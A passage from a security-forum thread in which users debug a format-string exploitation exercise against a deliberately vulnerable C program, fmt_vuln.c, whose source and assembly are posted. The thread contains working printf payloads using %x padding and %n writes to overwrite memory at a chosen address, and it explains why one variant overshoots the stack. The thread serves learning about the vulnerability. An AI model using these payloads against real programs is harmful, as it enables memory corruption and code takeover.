Page 2 of 2 FirstFirst 12
Results 11 to 17 of 17

Thread: format string : Question

  1. #11
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    I had refrained from responding since I wasn't sure, but since we are in the guessing stage

    Is there anyway you can post the ASM source ? Could there be possibly other things that were pushed on a stack or heap that you are trying to make sure is properly accounted for ?
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  2. #12
    Junior Member
    Join Date
    Jun 2005
    Posts
    8
    Here's the source for fmt_vuln.c
    -----------------------------------------

    #include <stdlib.h>

    int main(int argc, char *argv[])
    {
    char text[1024];
    static int test_val = -72;

    if(argc < 2)
    {
    printf("Usage: %s <text to print>\n", argv[0]);
    exit(0);
    }
    strcpy(text, argv[1]);

    printf("The right way:\n");
    // The right wat to print user-controlled input:
    printf("%s", text);
    // ---------------------------------------------

    printf("\nThe wrong way:\n");
    // The wrong way to print user-controlled input:
    printf(text);
    // ---------------------------------------------
    printf("\n");

    // Debug output
    printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);

    exit(0);
    }

  3. #13
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Kind of off the point, but wouldn't:

    char text[1024]; .. strcpy(text, argv[1]);

    Be ripe for a little buffer overflow action ?

    Anyway, I don't have a windows compiler so I can't convert this to the ASM as needed. But looking at the C, if I had to make an educated guess, I would say that the reason for the junk is the program is that it may be trying to overwrite a specific portion of the program to put in your own addresses and the junk is necessary to make it come out right on the stack. Its really hard to say though without seeing it. I recommend you download OllyDbg or IDA, compile the program and load the EXE there and set the breakpoint at the function call, then you can watch it in action.
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  4. #14
    Junior Member
    Join Date
    Jun 2005
    Posts
    8
    nebulus, I'm using Gentoo Linux, not Windows (Why did you assume that )

    I have already tried viewing stuff using gdb but couldn't get anything. Perhaps its because when I installed Gentoo I put compiler optimizations including -omit-frame-pointer in the make.conf file. Can I disable this while compiling a file, if yes then how?

    Here's the ASM created by gcc without the gdb (-g) option:

    .file "fmt_vuln.c"
    .data
    .align 4
    .type test_val.0, @object
    .size test_val.0, 4
    test_val.0:
    .long -72
    .section .rodata
    .LC0:
    .string "Usage: %s <text to print>\n"
    .LC1:
    .string "The right way:\n"
    .LC2:
    .string "%s"
    .LC3:
    .string "\nThe wrong way:\n"
    .LC4:
    .string "\n"
    .align 4
    .LC5:
    .string "[*] test_val @ 0x%08x = %d 0x%08x\n"
    .text
    .globl main
    .type main, @function
    main:
    pushl %ebp
    movl %esp, %ebp
    subl $1032, %esp
    andl $-16, %esp
    movl $0, %eax
    addl $15, %eax
    addl $15, %eax
    shrl $4, %eax
    sall $4, %eax
    subl %eax, %esp
    cmpl $1, 8(%ebp)
    jg .L2
    subl $8, %esp
    movl 12(%ebp), %eax
    pushl (%eax)
    pushl $.LC0
    call printf
    addl $16, %esp
    subl $12, %esp
    pushl $0
    call exit
    .L2:
    subl $8, %esp
    movl 12(%ebp), %eax
    addl $4, %eax
    pushl (%eax)
    leal -1032(%ebp), %eax
    pushl %eax
    call strcpy
    addl $16, %esp
    subl $12, %esp
    pushl $.LC1
    call printf
    addl $16, %esp
    subl $8, %esp
    leal -1032(%ebp), %eax
    pushl %eax
    pushl $.LC2
    call printf
    addl $16, %esp
    subl $12, %esp
    pushl $.LC3
    call printf
    addl $16, %esp
    subl $12, %esp
    leal -1032(%ebp), %eax
    pushl %eax
    call printf
    addl $16, %esp
    subl $12, %esp
    pushl $.LC4
    call printf
    addl $16, %esp
    pushl test_val.0
    pushl test_val.0
    pushl $test_val.0
    pushl $.LC5
    call printf
    addl $16, %esp
    subl $12, %esp
    pushl $0
    call exit
    .size main, .-main
    .section .note.GNU-stack,"",@progbits
    .ident "GCC: (GNU) 3.4.2 20041017 (Red Hat 3.4.2-6.fc3)"

  5. #15
    Junior Member
    Join Date
    Jun 2005
    Posts
    8
    Ah, some progress!! This is very interesting:

    The following 2 commands do the same thing, i.e. print 0x0000bbaa to the memory address.

    ./fmt_vuln `printf "\x70\x97\x04\x08JUNK\x71\x97\x04\x08"`%x%x%142x%n%17x%n

    ./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n12345678912345678%n


    So 146 in the second makes sense as compared to 142 in the first because the second does not have 4 bytes of JUNK.
    In the first, we have %17x after the first %n because (0xbb - 0xaa) is 17. In the second we achive the same purpose with 12345678912345678 which is 17 bytes.

    Now the confusing part is that the following command does not work (segmentation fault) even though it seems it should, looking at the above two commands:

    ./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n%17x%n


    This command should do the same thing as the one with 12345678912345678 right!!

  6. #16
    Senior Member Maestr0's Avatar
    Join Date
    May 2003
    Posts
    604
    Not exactly. Using %x doesnt let you control the bytes it lets you control the # bytes output by converting to hex and padding the parameter thats popped from the format function stack (it will always read sizeof(int) usually 4 bytes from the stack). Dont forget that each time you %x you are changing the format functions stack pointer, and are walking down the stack. So it performs two functions, it allows you to manipulate the number of bytes outputted by the printf (which you use for %n to write) but it also is how you move back (or 'dig up') through the stack to insure your address is being pointed at when the %n writes. The JUNK may be there just so you can pop them off and add 17 to the output counter. Try either: w/o the JUNK or %17x's (just use 17 fillers like above) or: with the pops(%17x's) and the JUNKs added after the addresses. Let me know how it works out, I'm curious.

    -Maestr0
    \"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software.\" -Jaron Lanier

  7. #17
    Junior Member
    Join Date
    Jun 2005
    Posts
    8
    OH! So %17x would go down the memory only once and pad it, I knew that %x would go down the memory by 4 bytes and it seemed obvious that %17x would thus go down by 17*4 = 68 bytes!!

    The two conditions you want (below), as I said in the last post, do work. And now we know why it does.


    ./fmt_vuln `printf "\x70\x97\x04\x08JUNK\x71\x97\x04\x08"`%x%x%142x%n%17x%n

    ./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n12345678912345678%n


    And now we know why the following doesn't work, since the %17x makes the stack grow and hence overshoot the 2nd address.


    ./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n%17x%n


    Maestr0 has saved the day. Actually more than a day!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •